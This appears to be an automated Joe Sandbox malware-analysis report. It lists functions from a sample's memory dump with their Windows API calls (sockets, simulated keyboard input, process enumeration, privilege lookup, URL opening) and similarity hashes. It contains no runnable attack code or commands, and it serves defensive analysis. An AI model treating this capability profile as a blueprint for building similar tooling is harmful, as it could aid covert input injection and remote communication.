
Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7feddb061efd45edd31cb0be9526e200f492219aadd0858c370704e20f73d8d5
Instruction ID: 7e9ac7001de42bd0fd2e61ee72cab7fe979acfb25363179b49da8069a1bde98d
Opcode Fuzzy Hash: 7feddb061efd45edd31cb0be9526e200f492219aadd0858c370704e20f73d8d5
Instruction Fuzzy Hash: 75514F34A00209AFCF54CF58C880ABE7BF6FF45360F158159FA559B6A0DB70AD81DB90

Function 000C9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000C9AD2
__itow.LIBCMT ref: 000C9B03

Part of subcall function 000C9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000C9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 000C9B6C
__itow.LIBCMT ref: 000C9BC3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 526c1cb10ebb072a923ea87e85e1638f193596026187c976104e67a95f13f075
Instruction ID: 8170e98b13372eaa2886d5a5122b1ba1dbc713e4ef458b6874687b8cb11a0c30
Opcode Fuzzy Hash: 526c1cb10ebb072a923ea87e85e1638f193596026187c976104e67a95f13f075
Instruction Fuzzy Hash: 8A417270A00209ABDF21DF54D849FFE7BB9EF49750F004059F909A7292DB749E44CBA5

Function 000E69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 000E69D1
WSAGetLastError.WSOCK32(00000000), ref: 000E69E1

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000E6A45
WSAGetLastError.WSOCK32(00000000), ref: 000E6A51

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 0613e5f5700ae3e5461bdff33234b870fe5d104a7a8ba728ddf4228d4c35855a
Instruction ID: c44eed8a2334b0becb912b371ad3387612160429d5bb4adde84fb492fa4b7ec2
Opcode Fuzzy Hash: 0613e5f5700ae3e5461bdff33234b870fe5d104a7a8ba728ddf4228d4c35855a
Instruction Fuzzy Hash: 39418175B402006FEB60AF24DC86F7D77E49F15B54F04C068FA19AB2C3DA799D018B96

Function 000E641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,000FF910), ref: 000E64A7
_strlen.LIBCMT ref: 000E64D9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 22638ab8522c21d2cbcb68e003520ba3595b166832d571aaa6ae202959bad61b
Instruction ID: 2e20b77b600fef9b7e1d1eb1d976204e3d4e3705401f59ac3a3ac6b6184f5da7
Opcode Fuzzy Hash: 22638ab8522c21d2cbcb68e003520ba3595b166832d571aaa6ae202959bad61b
Instruction Fuzzy Hash: 0E41E431A00504AFCB14EBA9EC95FFEB7A9AF14350F108159F91AA7293DB35AD00CB54

Function 000DB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 000DB89E
GetLastError.KERNEL32(?,00000000), ref: 000DB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 000DB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 000DB915

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6b30c1ad0a77dd1cfed7e61f8f9e6cfa3d31866a2157c757eae22ed1638517c5
Instruction ID: 156565da763a44f479373e083defc6b1a6c8d41196492d3bc439e10e600242c2
Opcode Fuzzy Hash: 6b30c1ad0a77dd1cfed7e61f8f9e6cfa3d31866a2157c757eae22ed1638517c5
Instruction Fuzzy Hash: 36412839A00651DFCB50EF14C484A9DBBE1AF4A710F09C099EC4A9B762CB34FD01DBA6

Function 000F8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000F88DE

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: be892cbef1902a1c17f52e7b74e058291a6508e44a5cecb72442cb51a69fb5c5
Instruction ID: 33eab9d6f0b78a15c9b27edc84a8c875550e9c9e118bcb716ee247c1b33a2ba2
Opcode Fuzzy Hash: be892cbef1902a1c17f52e7b74e058291a6508e44a5cecb72442cb51a69fb5c5
Instruction Fuzzy Hash: A531B23460810DAEEB609B68CC45BFD77A5EB06350FA88111FB15E69A1CFB09940B752

Function 000FAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 000FAB60
GetWindowRect.USER32(?,?), ref: 000FABD6
PtInRect.USER32(?,?,000FC014), ref: 000FABE6
MessageBeep.USER32(00000000), ref: 000FAC57

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f5d01e79ce17945a8bb82f419da8ff483b554ef832fc995c39a40559326ff0c1
Instruction ID: 4e62bb7962c8bf6dc23b28076c19f6fb80625cacd321c054ec7a59d33cac5dd3
Opcode Fuzzy Hash: f5d01e79ce17945a8bb82f419da8ff483b554ef832fc995c39a40559326ff0c1
Instruction Fuzzy Hash: C6417FB070011D9FCB21DF59C884B797BF6FF4A700F1880A5E6189B661D730A941EB92

Function 000D0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000D0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 000D0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 000D0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 000D0BFB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 762dddb29529b8d53bd9e6e5183a5bccce64d12b51a5d8b2373013f39f2ee8b1
Instruction ID: df5d11b40ab9f6800f4a8a7107bdfb192dc3e2fceb2e8c0d1fea09090355a648
Opcode Fuzzy Hash: 762dddb29529b8d53bd9e6e5183a5bccce64d12b51a5d8b2373013f39f2ee8b1
Instruction Fuzzy Hash: C5310770A48718AEFB308B258C05BFEBBE6AF45338F04425BE599523D1C3B989419775

Function 000D0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 000D0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 000D0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 000D0CE1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 000D0D33

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 6de413a2b70fc36d0ed57241c5a96462fcc35c46d6ecbe3a1e967e86958f8cab
Instruction ID: 421d4e2c6e4367b2b4e87b6730fa6b855a0d1ee874aff0902994b3fef6b67706
Opcode Fuzzy Hash: 6de413a2b70fc36d0ed57241c5a96462fcc35c46d6ecbe3a1e967e86958f8cab
Instruction Fuzzy Hash: 3E31F430A50718AEFF308B65C805BFEBBA6AF45320F04932FE489522D1C3799955D7B2

Function 000A61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000A61FB
__isleadbyte_l.LIBCMT ref: 000A6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000A6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000A628D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a7d38e8c385bc6967852c79502bce83f990ac1637f498828bdbbb918294fc56a
Instruction ID: 03b979406238b0187f413a1e67925c3f37f6773ae7f5456a8084e91e972fd383
Opcode Fuzzy Hash: a7d38e8c385bc6967852c79502bce83f990ac1637f498828bdbbb918294fc56a
Instruction Fuzzy Hash: FA31CD31600646AFEF228FA4CC44BBA7FF9FF42350F194029E824871A1E732E950DB90

Function 000F4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000F4F02

Part of subcall function 000D3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 000D365B
Part of subcall function 000D3641: GetCurrentThreadId.KERNEL32 ref: 000D3662
Part of subcall function 000D3641: AttachThreadInput.USER32(00000000,?,000D5005), ref: 000D3669

GetCaretPos.USER32(?), ref: 000F4F13
ClientToScreen.USER32(00000000,?), ref: 000F4F4E
GetForegroundWindow.USER32 ref: 000F4F54

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 126d7888d99f5033d934ab7eaa45a1a13f72db21990e6bf4690ae61b9dc62f34
Instruction ID: a22670c44aa4c344a2945340d85ef6b4a64c97c6b8e68a0c59a27a7a2200bce2
Opcode Fuzzy Hash: 126d7888d99f5033d934ab7eaa45a1a13f72db21990e6bf4690ae61b9dc62f34
Instruction Fuzzy Hash: 7D311E71D00208AFDB10EFA5C885DEFB7F9EF99300F10806AE515E7242DA759E45CBA5

Function 000D3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000D3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 000D3C88
Process32NextW.KERNEL32(00000000,?), ref: 000D3CA8
CloseHandle.KERNEL32(00000000), ref: 000D3D52

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 394045f0d9545a3a643e0116a677aef9f20243d555b0fad58fe2d907463e12f9
Instruction ID: 6be8bfdcd3a1cdd92f7ed78ea5bc8a0aa9b95bebda694032702c8e78de2eb197
Opcode Fuzzy Hash: 394045f0d9545a3a643e0116a677aef9f20243d555b0fad58fe2d907463e12f9
Instruction Fuzzy Hash: C331C2315083059FD300EF50D881AFFBBE8EF85350F50482DF589862A2EB759A49CB63

Function 000FC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

GetCursorPos.USER32(?), ref: 000FC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000AB9AB,?,?,?,?,?), ref: 000FC4E7
GetCursorPos.USER32(?), ref: 000FC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000AB9AB,?,?,?), ref: 000FC56E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c0412ac4a0a389bfe4acce8c260de53e126d97036bb65dfd27be3568916f6486
Instruction ID: 9b5e15f7ec70fbf1ce0907beef33e2591d87c9d7cd83eb2bd48ff41aeee942a4
Opcode Fuzzy Hash: c0412ac4a0a389bfe4acce8c260de53e126d97036bb65dfd27be3568916f6486
Instruction Fuzzy Hash: E531C33560081CAFDB258F58C859EFA7BF6EF49B10F044069FA058B661C735AD90EBA4

Function 000C8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000C810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000C8121
Part of subcall function 000C810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000C812B
Part of subcall function 000C810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000C813A
Part of subcall function 000C810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000C8141
Part of subcall function 000C810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000C8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000C86A3
_memcmp.LIBCMT ref: 000C86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000C86FC
HeapFree.KERNEL32(00000000), ref: 000C8703

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 8d2bf2cc29a06e27f604d7b4396c45556e8ade00b0d5656c50baf507945ea752
Instruction ID: a48febc1e31ed13498450e11cf743ffccdce9bcd8c8f6f390ab4000a462d6b3c
Opcode Fuzzy Hash: 8d2bf2cc29a06e27f604d7b4396c45556e8ade00b0d5656c50baf507945ea752
Instruction Fuzzy Hash: DF216972E00109EBDB10DFA4D949BEEB7F8EF44304F158059E944AB241EB30AE05DB94

Function 0009098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 000909AE

Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,000D7896,?,?,00000000), ref: 00075A2C
Part of subcall function 00075A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,000D7896,?,?,00000000,?,?), ref: 00075A50

_fprintf.LIBCMT ref: 000909E5
OutputDebugStringW.KERNEL32(?), ref: 000C5DBB

Part of subcall function 00094AAA: _flsall.LIBCMT ref: 00094AC3

__setmode.LIBCMT ref: 00090A1A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: d994d4e5b90e30e4892d20f3c63aac30fc1f00c1035fa5125996b43b95b1dad8
Instruction ID: 2bb4bbd65fefc9d9082c9db03abbfc8fe6fdae0a4063e7926b55f3d3678b04ce
Opcode Fuzzy Hash: d994d4e5b90e30e4892d20f3c63aac30fc1f00c1035fa5125996b43b95b1dad8
Instruction Fuzzy Hash: AA1136759086087FDF14B7B49C46DFE7BA89F46320F20415AF109972C3EE645C82A7E6

Function 000E1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000E17A3

Part of subcall function 000E182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000E184C
Part of subcall function 000E182D: InternetCloseHandle.WININET(00000000), ref: 000E18E9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 7cb01d5b472057f1788bd0cfcfded991d811e8d52661cde39fa966aa6ef48ec3
Instruction ID: 901a1239a1167f70506f81c4b38e8c64f3281de68535df96bd4f3c4534d21012
Opcode Fuzzy Hash: 7cb01d5b472057f1788bd0cfcfded991d811e8d52661cde39fa966aa6ef48ec3
Instruction Fuzzy Hash: C021D431204641BFEB169F61CC00FFABBEDFF48710F10402AFA51A6661DB759811E7A0

Function 000D3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,000FFAC0), ref: 000D3A64
GetLastError.KERNEL32 ref: 000D3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 000D3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,000FFAC0), ref: 000D3ADF

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: daada0f82f9d2aa6c9d6b447cb1ca4b126e4afd925c4651ba8d5d389d6af720e
Instruction ID: ef6fd5fed769620cb9f94ebf8b93d86e30b4f24b7cd393e0103d81cfe4ef0f08
Opcode Fuzzy Hash: daada0f82f9d2aa6c9d6b447cb1ca4b126e4afd925c4651ba8d5d389d6af720e
Instruction Fuzzy Hash: E42160756083069F8350DF28C8818AB77E8AF55364F144A2AF49DC73A2DB31DE45CB63

Function 000CDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000CF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000CDCD3,?,?,?,000CEAC6,00000000,000000EF,00000119,?,?), ref: 000CF0CB
Part of subcall function 000CF0BC: lstrcpyW.KERNEL32(00000000,?,?,000CDCD3,?,?,?,000CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 000CF0F1
Part of subcall function 000CF0BC: lstrcmpiW.KERNEL32(00000000,?,000CDCD3,?,?,?,000CEAC6,00000000,000000EF,00000119,?,?), ref: 000CF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,000CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 000CDCEC
lstrcpyW.KERNEL32(00000000,?,?,000CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 000CDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,000CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 000CDD46

Strings

cdecl, xrefs: 000CDD3D

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
